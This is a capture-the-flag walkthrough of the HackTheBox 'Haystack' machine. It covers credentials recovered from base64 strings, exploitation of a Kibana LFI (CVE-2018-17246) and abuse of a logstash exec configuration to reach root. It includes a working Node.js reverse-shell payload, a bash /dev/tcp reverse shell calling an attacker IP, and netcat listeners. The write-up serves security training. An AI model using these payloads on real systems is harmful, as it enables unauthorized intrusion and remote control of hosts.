hackthebox haystack walkthrough

Starting with a masscan of all TCP ports:

# masscan -e tun0 -p1-65535 --rate=1000 10.10.10.115

Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-07-02 17:00:00 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 22/tcp on 10.10.10.115
Discovered open port 9200/tcp on 10.10.10.115
Discovered open port 80/tcp on 10.10.10.115

Three ports are open: 22 (SSH), 80 (web) and 9200 (an HTTP API).

The web server reveals nothing other than an image.

[Image: hackthebox – haystack – needle]

Running the strings command on the image reveals a base64 string at the end.

# strings needle.jpg
-- snip --
rrNMz
#=pMr
BN2I
,'*'
I$f2/<-iy
bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==

Decoding the base64:

# echo bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg== | base64 -d
la aguja en el pajar es "clave"

The decoded text is Spanish and translates to:

the needle in the haystack is “key”

[Image: hackthebox – needle in the haystack is “key”]

Moving to port 9200. This looks like a search API where we can query for the key. Trying the following:

http://10.10.10.115:9200/_search?q=clave

which returns the following:

{
  "took": 95,
  "timed_out": false,
  "_shards": {"total": 11, "successful": 11, "skipped": 0, "failed": 0},
  "hits": {
    "total": 2,
    "max_score": 5.9335938,
    "hits": [
      {"_index": "quotes", "_type": "quote", "_id": "45", "_score": 5.9335938,
       "_source": {"quote": "Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}},
      {"_index": "quotes", "_type": "quote", "_id": "111", "_score": 5.3459888,
       "_source": {"quote": "Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}
    ]
  }
}

Translating the two quotes with translate.google.com:

I have to save the password for the machine: dXNlcjogc2VjdXJpdHkg
This key can not be lost, I keep it here: cGFzczogc3BhbmlzaC5pcy5rZXk=

These look like credentials; decoding the base64:

# echo dXNlcjogc2VjdXJpdHkg | base64 -d
user: security
# echo cGFzczogc3BhbmlzaC5pcy5rZXk= | base64 -d
pass: spanish.is.key

We now have a username and password for SSH.

# ssh security@10.10.10.115
security@10.10.10.115's password:
Last login: Tue Jul  2 08:43:23 2019 from 10.10.14.34
[[email protected] ~]$ 

We can now read the user.txt flag.

Poking around, we find that the server is running Kibana. I found it by checking the open ports on the server: netstat was not installed, so I had to find a workaround, reading the local ports straight out of /proc/net/tcp (they are stored as hex).

# declare -a array=($(tail -n +2 /proc/net/tcp | cut -d":" -f"3"|cut -d" " -f"1")) && for port in ${array[@]}; do echo $((0x$port)); done | sort | uniq
22
42838
43024
46676
47166
48866
49050
49166
49430
5601
60570
80
9200

Notice port 5601 (Kibana), which did not show up in the external scan.
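The one-liner above lists every local port in /proc/net/tcp, including the ephemeral ports of outgoing connections, and sorts them as strings (which is why 5601 lands between 49430 and 60570). As an added example (not from the original walkthrough), the following Python parser keeps only sockets in LISTEN state and decodes the bound address as well, so a service bound to loopback only, like port 5601 in this constructed sample, is immediately visible. The sample /proc/net/tcp content is constructed, not captured from the box.

```python
# Constructed sample of /proc/net/tcp (not captured from the box): two
# listening sockets (state 0A) and one established connection (state 01).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1 0
   1: 0100007F:15E1 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 2 0
   2: 730A0A0A:0016 220E0A0A:A760 01 00000000:00000000 00:00000000 00000000     0        0 3 0
"""

LISTEN = "0A"  # TCP state code for LISTEN in /proc/net/tcp


def parse_proc_net_tcp(text):
    """Return (local_ip, local_port, state, uid) for every socket row."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) < 8:
            continue
        ip_hex, port_hex = fields[1].split(":")
        # IPv4 addresses are stored as little-endian hex: 0100007F -> 127.0.0.1
        octets = [int(ip_hex[i:i + 2], 16) for i in (6, 4, 2, 0)]
        rows.append((".".join(map(str, octets)), int(port_hex, 16),
                     fields[3], int(fields[7])))
    return rows


def listening_ports(text):
    """Return sorted (ip, port) pairs for sockets in LISTEN state only."""
    return sorted((ip, port) for ip, port, st, _uid in parse_proc_net_tcp(text)
                  if st == LISTEN)


if __name__ == "__main__":
    # On a live host: listening_ports(open("/proc/net/tcp").read())
    for ip, port in listening_ports(SAMPLE_PROC_NET_TCP):
        print(f"{ip}:{port}")
```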

There is a CVE for Kibana: according to https://github.com/mpgn/CVE-2018-17246 it suffers from an LFI. Exploiting it:

First, set up the JS file:

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(4444, "10.10.14.44", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

Save the file as dev.js in the /dev/shm/ directory.

Then, listen for a shell on port 4444:

# nc -lvnp 4444

Then, on the box, execute the following:

$ curl "http://127.0.0.1:5601/api/console/[email protected]@SENSE_VERSION&apis=../../../../../../.../../../../dev/shm/dev.js"

You will get a shell.

[Image: hackthebox – haystack – kibana]

Upgrade the shell as defined here.

Again, we can explore further, now as the kibana user. We then find an interesting place: the logstash configuration. In /etc/logstash/conf.d there are 3 files:

input.conf
filter.conf
output.conf

Their contents are as follows:

$ cat input.conf
input {
	file {
		path => "/opt/kibana/logstash_*"
		start_position => "beginning"
		sincedb_path => "/dev/null"
		stat_interval => "10 second"
		type => "execute"
		mode => "read"
	}
}

$ cat filter.conf
filter {
	if [type] == "execute" {
		grok {
			match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
		}
	}
}

$ cat output.conf
output {
	if [type] == "execute" {
		stdout { codec => json }
		exec {
			command => "%{comando} &"
		}
	}
}

If you know logstash well this will be easy for you. If not: the input watches /opt/kibana for a file named "logstash_whatever", reads it every 10 seconds and removes it afterwards. The filter checks whether the message matches a certain pattern. Finally, the output executes whatever was captured as comando.

To execute our payload we need to match the pattern. This link will be helpful for testing the pattern. Go to the site; in the lower box, enter the following:

Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}

Here,
\s* = zero or more whitespace characters
\s+ = one or more whitespace characters
GREEDYDATA = everything that follows

This is the pattern from filter.conf that logstash tries to match.

…and in the upper box try to match the pattern.
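As an added example (not part of the original walkthrough), the following Python script reproduces what the grok filter does: it expands %{NAME:field} tokens into named regex groups and reports, for a set of constructed log lines, which ones the filter would match and what would end up in comando and therefore in the exec output. It uses the real grok pattern names but a deliberately tiny pattern table; the sample lines are constructed. The third sample line shows the \s* versus \s+ difference: with no whitespace after the colon the filter does not match.

```python
import re

# Small subset of logstash's built-in grok pattern names (values simplified);
# the page's filter only needs GREEDYDATA.
GROK_PATTERNS = {
    "GREEDYDATA": r".*",
    "WORD": r"\b\w+\b",
    "NUMBER": r"(?:[+-]?(?:[0-9]+(?:\.[0-9]+)?))",
}

# The match pattern from filter.conf.
FILTER_PATTERN = r"Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}"

# Constructed sample log lines (not from the box).
SAMPLE_LINES = [
    "Ejecutar comando : whoami",
    "Ejecutarcomando:   id",        # \s* allows zero spaces before 'comando' and ':'
    "Ejecutar comando :bash",       # no whitespace after ':' so \s+ fails
    "log rotated at 03:00",
]


def grok_to_regex(pattern):
    """Expand %{NAME} / %{NAME:field} tokens into a compiled Python regex."""
    def expand(m):
        name, _, field = m.group(1).partition(":")
        body = GROK_PATTERNS[name]
        return f"(?P<{field}>{body})" if field else f"(?:{body})"
    return re.compile(re.sub(r"%\{([^}]+)\}", expand, pattern))


def commands_that_would_run(lines, pattern=FILTER_PATTERN):
    """Return the 'comando' field of every line the grok filter would match."""
    rx = grok_to_regex(pattern)
    hits = []
    for line in lines:
        m = rx.search(line)        # grok patterns are unanchored, like search()
        if m:
            hits.append(m.group("comando"))
    return hits


if __name__ == "__main__":
    for cmd in commands_that_would_run(SAMPLE_LINES):
        print("would exec:", cmd)
```

Because output.conf hands comando to exec unchanged, anything that can write a matching line into /opt/kibana/logstash_* gets code execution as the logstash user; this is the configuration weakness the rest of the walkthrough abuses.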

After you have confirmed the pattern, create a file called “logstash_dev”:

$ vi /opt/kibana/logstash_dev

Paste the following:

Ejecutar comando : bash -i >& /dev/tcp/10.10.14.44/5252 0>&1

Save the file and make it executable:

$ chmod +x /opt/kibana/logstash_dev

Do not forget to listen for the shell; wait a while and you will get root:

# nc -lvnp 5252
listening on [any] 5252 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.115] 34416
bash: no hay control de trabajos en este shell
[[email protected] /]# cat /root/root.txt
